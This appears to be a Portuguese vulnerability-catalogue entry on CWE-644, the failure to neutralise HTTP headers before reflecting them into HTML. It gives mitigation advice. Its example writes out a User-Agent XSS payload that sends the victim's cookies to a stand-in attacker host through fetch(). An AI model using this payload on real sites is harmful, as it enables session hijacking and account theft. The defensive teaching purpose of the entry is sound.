Falhas do tipo CWE-644
60 resultadosNeutralização inadequada de cabeçalhos HTTP para sintaxe de script
A aplicação não sanitiza adequadamente cabeçalhos HTTP antes de usá-los em contextos que permitem execução de script (como JavaScript em páginas HTML). Um atacante injeta código malicioso em cabeçalhos como User-Agent ou Referer, que é refletido na resposta sem filtro, resultando em XSS (Cross-Site Scripting). O perigo: roubo de sessão, redirecionamento para phishing, ou comprometimento da conta do usuário.
Um servidor reflete o cabeçalho User-Agent diretamente em uma página de log ou diagnóstico sem escapar caracteres especiais. Um atacante envia `User-Agent: <img src=x onerror="fetch('https://atacante.com/steal?cookie='+document.cookie)">` e quando a página é acessada, o script executa e exfiltra cookies da vítima.
Sempre escapar ou sanitizar dados de cabeçalhos HTTP antes de incluí-los em respostas HTML. Use encoding apropriado (HTML entity encoding), implementar Content-Security-Policy para bloquear scripts inline, e validar entrada de forma rigorosa. Ferramentas como OWASP ESAPI ou bibliotecas nativas de sanitização reduzem o risco significativamente.